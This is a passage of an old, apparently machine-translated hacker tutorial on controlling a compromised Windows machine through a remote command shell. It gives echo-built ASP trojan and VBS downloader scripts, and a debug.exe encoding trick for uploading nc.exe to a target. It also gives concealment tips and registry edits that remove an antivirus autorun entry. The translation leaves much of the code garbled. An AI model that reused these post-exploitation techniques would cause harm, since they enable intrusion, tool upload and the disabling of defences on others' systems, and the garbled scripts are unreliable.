Command Line Interaction

Directory
1. Preface
2. File Transfer
3. System Configuration
4. Network Configuration
5. Software Installation
6. Windows scripts
7. Postscript

Preface
Cmd Shell (command line interaction) is an eternal topic for hackers. It has a long history and has a long history. This article aims to introduce and summarize some methods to control the Windows system under the command line. These methods are implemented using the built-in tools as much as possible.

File Transfer
The biggest problem with the cmd shell obtained by the overflow vulnerability is how to upload files. Due to the prevalence of worms, ports 139 or 445 required to connect to ipc $ are blocked by routes. In addition, the WinXP system enhances the protection of ipc $, and the use of ipc $ and default shared file upload methods is basically ineffective. Ftp and tftp are two feasible methods, which are well known and will not be described in this article. There are three other methods that you are familiar with. To sum up, I will try again:

1. Use the Echo command to write ASP Trojans.
The premise is that IIS has been installed on the target host.
Generally, ASP Trojans are large in size and are not suitable for writing files directly using the echo command. Here I provide a small one.
The echo version is provided directly:

@ Echo ^> up. asp

Note that there is only one line and there is no carriage return in the middle.
The generated up. asp cannot be accessed using a browser. You can only use the following script:

With wscript
If. arguments. count> dl. vbs
@ Echo w. open "get ",. arguments (0), 0: w. send: if w. status ^> 200 then. echo "Error:" + w. status :. quit> dl. vbs
@ Echo aso. type = 1: aso. open: aso. write w. responsebody: aso. savetofile. arguments (1), 2: end with> dl. vbs

Example: Download ps.exe and save it to c: path:

Cscript dl. vbs http://www.sometips.com/soft/ps.exe c: pathps.exe

Note that this is executed in the remote shell.

4. Execute the script + debug to restore any encoded Echo file.
Neither of the preceding methods can pass through the firewall. In addition, except for self-built Web servers, general Web resources are provided in the form of compressed files. If the target host does not have a decompression tool, it is still the same. So there is only a "killer!

The echo command can increase the value of the x operator to write ASCII code less than 128 characters, but not greater than or equal to 128. You can easily write local files to the remote host only by re-encoding the local files to display characters. The first thing we can think of is base64 encoding, that is, the encoding method of email attachments. However, vbs does not support bitwise x, so encoding and decoding are complicated. What's more troublesome is that the ability of scripts to process files in a binary stream is poor. (ADODB. Stream can write files in Stream mode, but I cannot construct the corresponding data type. Binary data streams can be converted into strings using the midb function, but this is not the case. It took me two days to solve the problem. If anyone can use vbs or js to write any byte data to a file, please kindly advise .)

No. You only need debug.exe. Many people know the principle. I will not introduce it, but I will directly give the result-encoding script:

Fp = wscript. arguments (0)
Fn = right (fp, len (fp)-limit Rev (fp ,""))
With createobject ("adodb. stream ")
. Type = 1:. open:. loadfromfile fp: str =. read: sl = lenb (str)
End
Sll = sl mod 65536: slh = sl65536
With createobject ("scripting. filesystemobject"). opentextfile (fp & ". bat", 2, true)
. Write "@ echo str = """
For I = 1 to sl
Bt = ascb (midb (str, I, 1 ))
If bt> debug. vbs "+ vbcrlf +" @ echo + """
Next
. Writeline "> debug. vbs" + vbcrlf + "@ echo with wscript. stdout: r = vbcrlf "_
+ ": For I = 1 to len (str) step 48:. write" "e" "+ hex (256 + (I-1)/2 )"_
+ ": For j = I to I + 46 step 2 :. write "+ mid (str, j, 2): next :. write r: next> debug. vbs"
. Writeline "@ echo. write "" rbx "" + r + "+ hex (slh) +" + r + "" rcx "" + r + "+ hex (sll) _
+ "+ R +" "n debug. tmp" "+ r +" "w" "+ r +" q "" + r: end "_
+ "> Debug. vbs & cscript // nologo debug. vbs | debug.exe> nul & ren debug. tmp "" & fn & "" & del debug. vbs"
End

Save it as echo. vbs. To upload nc.exe, run the following command on the local command line:

Cscript echo. vbs nc.exe

You can also drag and drop the icon of the file to be transferred to the icon of the script file.
Just a moment later, A nc.exe. bat will be generated in the current directory. Open it with notepad and other editing tools. You can see the following content:

@ Echo str = "Courier" _> debug. vbs
@ Echo + "login" _> debug. vbs
@ Echo + "login" _> debug. vbs
@ Echo + "login" _> debug. vbs
............
............ (Omitted rows)
............
@ Echo + ""> debug. vbs
@ Echo with wscript. stdout: r = vbcrlf: for I = 1 to len (str) step 48 :. write "e" + hex (256 + (I-1)/2): for j = I to I + 46 step 2 :. write "" + mid (str, j, 2): next :. write r: next> debug. vbs
@ Echo. write "rbx" + r + "0" + r + "rcx" + r + "E800" + r + "n debug. tmp "+ r +" w "+ r +" q "+ r: end with> debug. vbs & cscript // nologo debug. vbs | debug.exe> nul & ren debug. tmp "NC. EXE "& del debug. vbs

Select All> copy> switch to the remote command line window and paste it.
If the network speed is not slow, the entire upload process takes about 20 seconds.

Notes:
1. The transmission of large files is unstable and may cause shell to die. The smaller the file, the better the effect. We recommend that the size of the original file not exceed kb.
2. Before transmitting large files, you can upload a small file to keep the 16-bit Virtual Machine ntvdm.exe in the background. After all files are uploaded, The ntvdm process should be killed for concealment.
3. Some command lines in cmd shellrun two additional vehicles, so nc.exe. bat cannot be used directly.
4. The length of a single command is limited. Therefore, you cannot use only one echo to complete all tasks. In addition, for the cmd shell provided by nc, a longer command will automatically cause shell to exit (overflow ?). You can modify 128 in the "I mod 128 = 0" statement to adjust the length of each echo command. The character of each echo is multiplied by 2.
5. No script is involved in the decoding process. The script is used to reduce the amount of data transmitted (because the data is compressed ). If I have time, I will write a better script, strengthen the data compression capability, and add the data validation function.

Of course everything is easy to upload files, but many x tools are more convenient for Windows. When looking for the required tools, do not forget Windows itself.

System Configuration
This section includes three aspects: Registry, service, and group policy.

Let's talk about the Registry first. Many tools for accessing the registry under the command line are interactive. The shell generated by overflow cannot redirect the input/output stream again, so it cannot be used.
It's good to use regedit.exe in the system.

1. Read the Registry
Export the registry key you want to query and view it with type, for example:

C:> regedit/e 1.reg "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"

C:> type 1.reg | find "PortNumber"
"PortNumber" = dword: 00000d3d

C:> del 1.reg

Therefore, the terminal service port is 3389 (hexadecimal d3d)

2. Modify/Delete the registry key.
First echo a reg file and then import it, for example:

Echo Windows Registry Editor Version 5.00> 1.reg
Echo.> 1.reg
Echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftTelnetServer1.0]> 1.reg
Echo "TelnetPort" = dword: 00000913> 1.reg
Echo "NTLM" = dword: 00000001> 1.reg
Echo.> 1.reg
Regedit/s 1.reg

Change the telnet service port to 2323 (hexadecimal 913), and the NTLM authentication method is 1.

To delete an item, add or subtract a number before the name, for example:

[-HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesServ-U]

To delete a value, use the minus sign after the equal sign, for example:

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"KAVRun" =-

3. Use the inf file to access the registry.
You can also use the following inf file to implement the three functions of the registry:

[Version]
Signature = "$ windows nt $"
[Defainstall install]
AddReg = My_AddReg_Name
DelReg = My_DelReg_Name
[My_AddReg_Name]
HKLM, SOFTWAREMicrosoftTelnetServer1.0, TelnetPort, 0x00010001,2323
HKLM, SOFTWAREMicrosoftTelnetServer1.0, NTLM, 0x00010001,1
[My_DelReg_Name]
HKLM, SYSTEMCurrentControlSetServicesServ-U
HKLM, SOFTWAREMicrosoftWindowsCurrentVersionRun, KAVRun

Write it to c: patheg. inf and run the following command to "Install ":

Rundll32.exe setupapi, InstallHinfSection DefaultInstall 128 c: patheg. inf

Notes:
1. [Version] and [defainstall install] are required. There must be at least one AddReg and DelReg. My_AddReg_Name and My_DelReg_Name can be